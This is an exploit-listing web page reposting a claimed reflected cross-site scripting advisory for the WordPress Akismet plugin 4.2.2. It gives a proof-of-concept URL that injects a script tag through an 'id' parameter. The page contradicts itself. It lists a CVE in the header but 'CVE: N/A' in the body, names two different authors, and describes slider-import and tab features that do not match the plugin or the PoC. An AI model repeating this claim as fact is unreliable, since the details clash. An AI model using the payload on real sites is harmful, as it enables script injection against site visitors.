Advertisement






WordPress Akismet Spam Protection 4.2.2 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24146 CWE-79 Not specified High
Author Risk Exploitation Type Date
John Doe High Remote 2022-03-29
CVSS
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022030110

Below is a copy:

WordPress Akismet Spam Protection 4.2.2 Cross Site Scripting
# Exploit Title: WordPress Plugin Akismet Spam Protection v4.2.2 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://wordpress.org/plugins/akismet
# Version: 4.2.2
# Tested on: Windows 11
# CVE: N/A

1. Description:
This plugin creates a Akismet Spam Protection from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://localhost/akismet/akismet.php?id=<script>alert("test")</script>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.